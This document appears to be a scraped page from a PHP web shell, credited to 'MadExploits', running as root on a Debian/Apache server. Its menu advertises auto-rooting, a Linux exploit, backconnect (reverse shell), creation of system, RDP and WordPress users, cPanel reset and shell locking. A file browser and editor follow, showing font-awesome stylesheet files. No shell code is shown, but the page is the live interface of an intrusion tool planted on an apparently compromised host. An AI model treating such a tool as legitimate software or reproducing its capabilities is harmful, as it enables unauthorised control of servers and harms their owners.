Linux e000727e84fa 5.4.0-208-generic #228-Ubuntu SMP Fri Feb 7 19:41:33 UTC 2025 x86_64
Apache/2.4.62 (Debian)
: 192.168.16.2 | : 192.168.16.1
Cant Read [ /etc/named.conf ]
8.2.27
root
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
vendor /
font-awesome /
less /
[ HOME SHELL ]
Name
Size
Permission
Action
animated.less
713
B
-rw-r--r--
bordered-pulled.less
585
B
-rw-r--r--
core.less
452
B
-rw-r--r--
fixed-width.less
119
B
-rw-r--r--
font-awesome.less
495
B
-rw-r--r--
icons.less
48.55
KB
-rw-r--r--
larger.less
370
B
-rw-r--r--
list.less
377
B
-rw-r--r--
mixins.less
1.57
KB
-rw-r--r--
path.less
771
B
-rw-r--r--
rotated-flipped.less
622
B
-rw-r--r--
screen-reader.less
118
B
-rw-r--r--
stacked.less
476
B
-rw-r--r--
variables.less
22.03
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : animated.less
// Animated Icons // -------------------------- .@{fa-css-prefix}-spin { -webkit-animation: fa-spin 2s infinite linear; animation: fa-spin 2s infinite linear; } .@{fa-css-prefix}-pulse { -webkit-animation: fa-spin 1s infinite steps(8); animation: fa-spin 1s infinite steps(8); } @-webkit-keyframes fa-spin { 0% { -webkit-transform: rotate(0deg); transform: rotate(0deg); } 100% { -webkit-transform: rotate(359deg); transform: rotate(359deg); } } @keyframes fa-spin { 0% { -webkit-transform: rotate(0deg); transform: rotate(0deg); } 100% { -webkit-transform: rotate(359deg); transform: rotate(359deg); } }
Close